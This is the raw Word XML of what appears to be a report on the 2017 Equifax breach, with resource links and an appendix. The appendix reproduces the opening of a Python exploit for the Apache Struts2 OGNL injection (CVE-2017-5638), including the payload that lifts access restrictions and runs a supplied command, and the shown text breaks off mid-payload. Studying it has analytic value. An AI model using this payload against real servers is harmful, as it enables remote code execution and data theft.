    <w:p w14:paraId="6D239184" w14:textId="165CA5E9" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00316267" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ED598D" w14:textId="77777777" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00316267" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FBB731" w14:textId="09D766FB" w:rsidR="00294E93" w:rsidRPr="007D02A2" w:rsidRDefault="00294E93" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigations</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27966D59" w14:textId="50EDB1B8" w:rsidR="00927312" w:rsidRPr="007D02A2" w:rsidRDefault="00927312" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F279FF" w14:textId="1F3EED20" w:rsidR="00927312" w:rsidRPr="007D02A2" w:rsidRDefault="00927312" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F4EA7" w14:textId="77777777" w:rsidR="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B30E1AF" w14:textId="27BB8739" w:rsidR="00681BF6" w:rsidRPr="007D02A2" w:rsidRDefault="004D5F52" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23A420" w14:textId="4E83A25F" w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidRDefault="00773A1A" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.fastcompany.com/40464730/equifax-has-a-super-shady-history-that-might-explain-its-shady-present</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C8A1AC4" w14:textId="17E5E9EB" w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidRDefault="00773A1A" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Equifax</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2721ED8A" w14:textId="2E1A2B80" w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidRDefault="00773A1A" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.cpajournal.com/2017/12/15/equifax-data-breach/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70C2C10D" w14:textId="4C1E6F4A" w:rsidR="004D5F52" w:rsidRPr="007D02A2" w:rsidRDefault="00773A1A" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.equifax.com/business/all-products/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4473F64F" w14:textId="1973FED5" w:rsidR="00316267" w:rsidRPr="007D02A2" w:rsidRDefault="00316267" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.consumer.ftc.gov/blog/2017/09/equifax-data-breach-what-do</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56924187" w14:textId="319887AF" w:rsidR="001B2958" w:rsidRPr="007D02A2" w:rsidRDefault="00F94351" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.cnbc.com/2017/09/07/credit-reporting-firm-equifax-says-cybersecurity-incident-could-potentially-affect-143-million-us-consumers.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6744E17A" w14:textId="3F844BFB" w:rsidR="00F94351" w:rsidRPr="007D02A2" w:rsidRDefault="00927312" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=bh1gzJFVFLc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57C80076" w14:textId="01D11E8E" w:rsidR="00927312" w:rsidRDefault="00E36FC7" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00F84946">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=4pgg2LCY8iE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E64AE96" w14:textId="1AC1F1EC" w:rsidR="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00F84946">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/41570/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F5AFCB6" w14:textId="5F16DDB5" w:rsidR="007D02A2" w:rsidRDefault="007D02A2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CV</w:t>
        </w:r>
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>E</w:t>
        </w:r>
        <w:r w:rsidRPr="007D02A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-2017-5638</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B444E96" w14:textId="505FCE3C" w:rsidR="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677C5B1" w14:textId="37290170" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python script similar to exploit carried out on parser for Equifax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B80E7C" w14:textId="77777777" w:rsidR="000E4CC2" w:rsidRPr="000E4CC2" w:rsidRDefault="000E4CC2" w:rsidP="000E4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10B05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 coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49FF35"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6AD0428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import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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52964B87"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import</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ADC635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23DAFC22"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230778C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def</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1F8C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"%{(#_='multipart/form-data')."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A20637"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dm</w:t>
      </w:r>
      <w:proofErr w:type="spell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ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D56C0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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>memberAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E591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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>memberAccess</w:t>
      </w:r>
      <w:proofErr w:type="spell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dm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC3CD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"((#container=#context['</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com.opensymphony</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.xwork2.ActionContext.container'])."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47DA0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"(#ognlUtil=#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>container.getInstance</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68832B88"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lastRenderedPageBreak/>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ognlUtil.getExcludedPackageNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).clear</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29F213"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ognlUtil.getExcludedClasses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).clear</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63388B6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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>context.setMemberAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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dm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49F493"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='%s')."</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r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F38575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"(#iswin=(@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.System@getProperty('os.name').toLowerCase().contains('win')))."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A5C7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"(#cmds=(#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iswin?{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
